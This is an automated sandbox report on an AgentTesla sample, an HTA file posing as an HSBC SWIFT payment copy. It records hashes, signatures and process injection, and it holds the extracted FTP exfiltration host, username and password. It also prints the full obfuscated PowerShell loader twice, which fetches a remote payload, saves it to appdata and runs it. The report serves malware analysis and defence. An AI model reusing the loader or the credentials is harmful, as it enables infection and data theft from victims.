Analysis
- max time kernel: 140s
- max time network: 146s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 29-04-2024 13:05
Static task: static1
Behavioral task: behavioral1
- Sample: 25042024 - HSBC Payment SWIFT COPY PAGES.hta
- Resource: win7-20240220-en
Behavioral task: behavioral2
- Sample: 25042024 - HSBC Payment SWIFT COPY PAGES.hta
- Resource: win10v2004-20240419-en
General
- Target: 25042024 - HSBC Payment SWIFT COPY PAGES.hta
- Size: 8KB
- MD5: faf3762a6e994f4e79d87d817ce62e16
- SHA1: 85517ba95bed123d356ce026192d913acf6e97ea
- SHA256: 413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f
- SHA512: b7522895d2d72d1980184b0d0dc19d1e22082311bfbbe77ead3e9039c650dd5527970c86a74982c87e05255d18e7c6b016187747b4b99be0b155ca351ecf1c92
- SSDEEP: 192:pFH6Jy7ik4n2AV2PP0PFDQlHfCe4z9dfzWQ/0EY2ibM0wTstRA:pj472EPFy/Ce4znfzWQ//JiM5Te+
Malware Config
Extracted: agenttesla
- Protocol: ftp
- Host: ftp://ftp.petrolic-eg.com
- Port: 21
- Username: outcome
- Password: Random@1245
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request (2 IoCs)
Processes (flow | pid | process):
  5 | 2888 | powershell.exe
  7 | 2888 | powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
-
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow | ioc):
  13 | api.ipify.org
  14 | api.ipify.org
-
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes (pid | process):
  352 | wab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes (pid | process):
  2688 | powershell.exe
  352 | wab.exe
-
Suspicious use of SetThreadContext (1 IoCs)
Processes (description | pid | process | target process):
  PID 2688 set thread context of 352 | 2688 | powershell.exe | wab.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings
Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
-
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid | process):
  2888 | powershell.exe
  2688 | powershell.exe
  2688 | powershell.exe
  352 | wab.exe
  352 | wab.exe
-
Suspicious behavior: MapViewOfSection (1 IoCs)
Processes (pid | process):
  2688 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 2888 | powershell.exe
  Token: SeDebugPrivilege | 2688 | powershell.exe
  Token: SeDebugPrivilege | 352 | wab.exe
-
Suspicious use of WriteProcessMemory (22 IoCs)
Processes (description | pid | process | target process):
  PID 2768 wrote to memory of 2888 | 2768 | mshta.exe | powershell.exe (4 entries)
  PID 2888 wrote to memory of 2616 | 2888 | powershell.exe | cmd.exe (4 entries)
  PID 2888 wrote to memory of 2688 | 2888 | powershell.exe | powershell.exe (4 entries)
  PID 2688 wrote to memory of 1728 | 2688 | powershell.exe | cmd.exe (4 entries)
  PID 2688 wrote to memory of 352 | 2688 | powershell.exe | wab.exe (6 entries)
Processes
-
C:\Windows\SysWOW64\mshta.exe (depth 1)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\25042024 - HSBC Payment SWIFT COPY PAGES.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS 
iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. 
VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar 
Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS 
iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. 
VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar 
Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"
-
C:\Program Files (x86)\windows mail\wab.exe (depth 4)
  Command line: "C:\Program Files (x86)\windows mail\wab.exe"
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: b3136c14ef70cee96f41cd5679be3426
  SHA1: 1ccb442efd7159cf26bed887ff12e006c92d03e3
  SHA256: 203dbf2a8917f219b4ed0c53f219639dae25286f33a4eca83dc3441be2218a81
  SHA512: e76ccf382fe76c61d97140a93d3f3654cefe494fc2ba726f3bd322168b92f18e9e228087fd1b786a15d27e205a95c10f7d123dc4d4ec2ce2ca394b98fba233e8
- C:\Users\Admin\AppData\Roaming\Specificeringens.fri
  Filesize: 426KB
  MD5: 36c02906ed6e72454a84bf3f874f3e8d
  SHA1: 0f8ba64a4da4871058d283a7e08b4a185e7b891e
  SHA256: 7a565e10f6fd5a9e8c22c632c3c86f0b66773e373e4e14deb6bd190382c3cb98
  SHA512: a5b1337872b951392570b2238e8334b60172a257631f0bfb3680dd0ee75490258c4200e08bb9b1f257afdfd0ca17f72d49c612e5e8ff17ded6f4c0ea33f813f8
- memory/352-37-0x0000000000FD0000-0x0000000002032000-memory.dmp
  Filesize: 16.4MB
- memory/352-38-0x0000000000FD0000-0x0000000001010000-memory.dmp
  Filesize: 256KB
- memory/2688-15-0x0000000006530000-0x0000000008321000-memory.dmp
  Filesize: 29.9MB